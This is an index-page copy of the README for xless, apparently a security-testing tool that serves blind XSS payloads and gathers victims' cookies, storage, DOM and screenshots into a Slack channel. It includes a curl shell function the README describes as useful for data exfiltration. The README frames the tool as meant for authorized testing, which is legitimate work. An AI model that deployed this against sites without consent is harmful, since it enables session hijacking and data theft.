Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mazen160/xless
The Serverless Blind XSS App
https://github.com/mazen160/xless
blind-xss browser-exploitation exfiltration out-of-band serverless xss
Last synced: 20 days ago
JSON representation
The Serverless Blind XSS App
- Host: GitHub
- URL: https://github.com/mazen160/xless
- Owner: mazen160
- Created: 2019-01-29T20:00:52.000Z (almost 6 years ago)
- Default Branch: master
- Last Pushed: 2024-03-28T11:02:03.000Z (9 months ago)
- Last Synced: 2024-11-16T02:56:14.130Z (27 days ago)
- Topics: blind-xss, browser-exploitation, exfiltration, out-of-band, serverless, xss
- Language: JavaScript
- Homepage:
- Size: 106 KB
- Stars: 329
- Watchers: 8
- Forks: 128
- Open Issues: 11
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- WebHackersWeapons - xless - xss`](/categorize/tags/blind-xss.md)|![linux](/images/linux.png)![macos](/images/apple.png)![windows](/images/windows.png)[![JavaScript](/images/javascript.png)](/categorize/langs/JavaScript.md)| (Weapons / Tools)
README
xless
The Serverless Blind XSS App
## :information_source: About The Project
**Xless** is a serverless Blind XSS (bXSS) application that can be used to identify Blind XSS vulnerabilities using your own deployed version of the application.
There is no need to run a full deployment process; just setup a [vercel.com](https://vercel.com/) account and run `bash deploy.sh`.
That's it. You now have a fully-running Blind XSS listener that uses Slack to notify you for callbacks.## :warning: Requirements
* [vercel.com](https://vercel.com/) account: Vercel provides a **free plan** for serverless. If you use another provider for serverless, code changes should be minimal.
* Slack Incoming Webhook URL.
* IMGBB (free) Account and API key - for the screenshots.## :rocket: Deployment
1. Run `bash deploy.sh````bash
$ bash deploy.sh> Deploying ~/xless under X
> https://custom-xless-deployment.vercel.app [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
```
2. Use the URL for blind XSS testing :fire:**Xless will automatically serve the XSS payload, collect information, and exfiltrate it into your serverless app, which is then sent right to you in Slack.**
## :speech_balloon: Example Payload
```html
```
## :eyes: Demo
![Demo](https://raw.githubusercontent.com/mazen160/public/master/static/images/xless-screenshot.png)## :incoming_envelope: Collected Data
* Cookies
* User-Agent
* HTTP Referrer
* Browser DOM
* Browser Time
* Document Location
* Origin
* LocalStorage
* SessionStorage
* IP Address
* Screenshot## :satellite: Out-of-Band (OOB) Callbacks Listener
Xless also works as an OOB (Out-of-Band) callbacks listener for HTTP/HTTPS requests. Any HTTP GET request that is sent to non-parent path will be alerted.
## :eyes: Demo
```bash
$ curl https://custom-xless-deployment.vercel.app/callback-canary
```![OOB CallBack Listener Demo](https://raw.githubusercontent.com/mazen160/public/master/static/images/xless-screenshot-oob-callback-example.png)
Or anything random, such as:
```bash
$ curl https://custom-xless-deployment.vercel.app/88bf0ecd
```## :man_health_worker: Health Check
Xless provides a `/health` endpoint to let you know that everything is configured correctly.
The current tests are the existance of the API keys and a successful image upload to IMGBB.## Example Blind XSS payloads
You can view a number of handy XSS payloads for your xless app at `$URL/examples`
* URL: `https://custom-xless-deployment.vercel.app/examples`
Once you deploy your app, you can find the examples there.## :envelope_with_arrow: Scriptable Messages
You can use Xless to send direct messages to your listener. It can be useful in data exfiltration or as a scriptable way to send messages and alerts to your Slack app.
```shell
# on your (bashrc / zshrch) file:
function xless() {
curl -s https://custom-xless-deployment.vercel.app/message --data "text=$1"
}
```## Contribution
Contribution is very welcome. Please share your ideas by Github issues and pull requests.Here are some ideas to start with:
1. ~~Enabling sharing of page screenshot~~.
2. ~~Scriptable message~~.
3. _Your idea of a new feature_?## Acknowledgement
* [Matthew Bryant](https://github.com/mandatoryprogrammer) for the XSS Hunter project.
* [Rami Ahmed](https://twitter.com/rami_ahmad) for the "xless" name idea.
* [Damian Ebelties](https://twitter.com/DamianEbelties) for the logo.
* [Rotem Reiss](https://twitter.com/2rs3c) for the screenshot feature.
* [Vercel.com](https://vercel.com/) for operating a great serverless platform.## Awesome Similar Projects
* [Azure-xless](https://github.com/dgoumans/Azure-xless): An Xless implementation for Microsoft Azure Function by [Daan Goumans](https://twitter.com/daangoumans).
## Legal Disclaimer
This project is made for educational and ethical testing purposes only. Usage of xless for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.## License
The project is currently licensed under MIT License.## Author
*Mazin Ahmed*
* Website: [https://mazinahmed.net](https://mazinahmed.net)
* Email: mazin [at] mazinahmed [dot] net
* Twitter: [https://twitter.com/mazen160](https://twitter.com/mazen160)
* Linkedin: [http://linkedin.com/in/infosecmazinahmed](http://linkedin.com/in/infosecmazinahmed)